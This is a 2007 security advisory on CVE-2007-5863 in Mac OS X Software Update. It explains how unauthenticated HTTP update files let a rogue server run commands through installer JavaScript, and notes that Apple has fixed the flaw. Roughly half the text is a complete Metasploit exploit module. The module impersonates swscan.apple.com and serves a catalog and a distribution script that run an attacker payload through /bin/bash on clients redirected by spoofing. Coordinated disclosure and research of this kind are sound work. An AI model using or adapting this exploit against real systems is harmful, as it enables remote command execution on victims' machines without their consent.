appleupdate-exec.txt

`---------------------------------------------------------------------  
Apple Mac OS X Software Update Remote Command Execution Vulnerability  
  
Copyright (c) 2007 Moritz Jodeit <[email protected]> (2007/12/17)  
---------------------------------------------------------------------  
  
  
I. Vulnerability Description  
  
The OS X Software Update mechanism uses so called `distribution packages' [1],  
which basically consist of two parts. The XML `catalog file', which lists the  
available updates and the `distribution definition files' [1], which contain  
information encoded in XML and JavaScript, defining every aspect of the  
user experience, when installing an update.  
  
When OS X checks for new updates, it first contacts swscan.apple.com  
to receive the XML catalog file. This file references the distribution  
definition files, which can reside on another server. Software Update  
receives these files and calls some of the JavaScript functions to check,  
if the update is suited for the local machine.  
  
The catalog file and the distribution definition files are both received  
using HTTP whithout any authentication. By running a malicious update server,  
it is possible to provide distribution definition files, which execute  
arbitrary commands using JavaScript on the remote machine requesting the  
update. The System.run() method can be used for this, if the  
`allow-external-scripts' option was set in the distribution definition  
file, as documented in the "Installer JavaScript Reference" [2].  
  
[1] http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/  
[2] http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/  
  
  
II. Impact  
  
Combined with the ability to intercept requests to the official Apple update  
server by other means like ARP or DNS spoofing, it is possible to execute  
arbitrary commands on all clients requesting updates. OS X automatically  
checks for updates at regular intervals (default is weekly), which allows  
for exploitation, even without any user intervention.  
  
  
III. Solution  
  
This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17.  
  
  
IV. Vendor Response  
  
2007/12/06 Initial contact with <[email protected]>  
2007/12/06 Acknowledgement of received report  
2007/12/12 Agreement on public release date  
2007/12/17 Coordinated release of updates and advisory  
  
  
V. Proof Of Concept  
  
##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/projects/Framework/  
##  
  
require 'msf/core'  
  
module Msf  
  
class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote  
  
include Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apple OS X Software Update Command Execution',  
'Description' => %q{  
This module exploits a feature in the Distribution Packages,  
which are used in the Apple Software Update mechanism. This feature  
allows for arbitrary command execution through JavaScript. This exploit  
provides the malicious update server. Requests must be redirected to  
this server by other means for this exploit to work.  
},  
'Author' => [ 'Moritz Jodeit <[email protected]>' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2007-5863'],  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
'DisableNops' => true,  
},  
'Platform' => 'osx',  
'Targets' =>  
[  
[  
'Automatic',  
{  
'Platform' => [ 'unix' ],  
'Arch' => ARCH_CMD,  
},  
],  
],  
'DisclosureDate' => 'Dec 17 2007',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),  
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])  
], self.class)  
end  
  
# Encode some characters using character entity references and escape  
# any quotation characters, by splitting the string into multiple parts.  
def encode_payload(payload)  
encoded = payload.gsub(/[&<>"']/) do |s|  
case s  
when '&': "&"  
when '<': "<"  
when '>': ">"  
when '"': '"+\'"\'+"'  
when '\'': "'"  
end  
end  
return '"' + encoded + '"'  
end  
  
# Generate the initial catalog file with references to the  
# distribution script, which does the actual exploitation.  
def generate_catalog(server)  
languages = [ "", "Dutsch", "English", "French", "German", "Italian", "Japanese",  
"Spanish", "da", "fi", "ko", "no", "pt", "sv", "zh_CN", "zh_TW" ]  
productkey = rand_text_numeric(3) + "-" + rand_text_numeric(4)  
distfile = rand_text_alpha(8) + ".dist"  
  
sucatalog = '<?xml version="1.0" encoding="UTF-8"?>'  
sucatalog << '<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'  
sucatalog << '<plist version="1.0">'  
sucatalog << '<dict>'  
sucatalog << '<key>Products</key><dict>'  
sucatalog << "<key>#{productkey}</key><dict>"  
sucatalog << '<key>Distributions</key><dict>'  
  
languages.each do |l|  
sucatalog << "<key>#{l}</key><string>http://#{server}/#{distfile}</string>\n"  
end  
  
sucatalog << '</dict></dict></dict></dict></plist>'  
  
return sucatalog  
end  
  
# Generate distribution script, which calls our payload using JavaScript.  
def generate_dist(payload)  
func = rand_text_alpha(8)  
  
dist = '<?xml version="1.0" encoding="UTF-8"?>'  
dist << "<installer-gui-script minSpecVersion='1'>"  
dist << '<options allow-external-scripts = "yes"/>'  
dist << "<choices-outline ui='SoftwareUpdate'>"  
dist << "<line choice='su'/>"  
dist << "</choices-outline>"  
dist << "<choice id='su' visible ='#{func}()'/>"  
dist << "<script>"  
dist << "function #{func}() { system.run('/bin/bash', '-c', #{encode_payload(payload)}); }"  
dist << "</script>"  
dist << "</installer-gui-script>"  
  
return dist  
end  
  
def on_request_uri(cli, request)  
date = Time.now  
server = "swscan.apple.com"  
  
header = {  
'Content-Type' => 'text/plain',  
'Last-Modified' => date,  
'Date' => date,  
}  
  
if request.uri =~ /\.sucatalog$/  
print_status("Sending initial distribution package to #{cli.peerhost}:#{cli.peerport}")  
body = generate_catalog(server)  
elsif request.uri =~ /\.dist$/  
print_status("Sending distribution script to #{cli.peerhost}:#{cli.peerport}")  
return if ((p = regenerate_payload(cli)) == nil)  
body = generate_dist(p.encoded)  
else  
return  
end  
send_response(cli, body, header)  
handler(cli)  
end  
  
end  
end  
`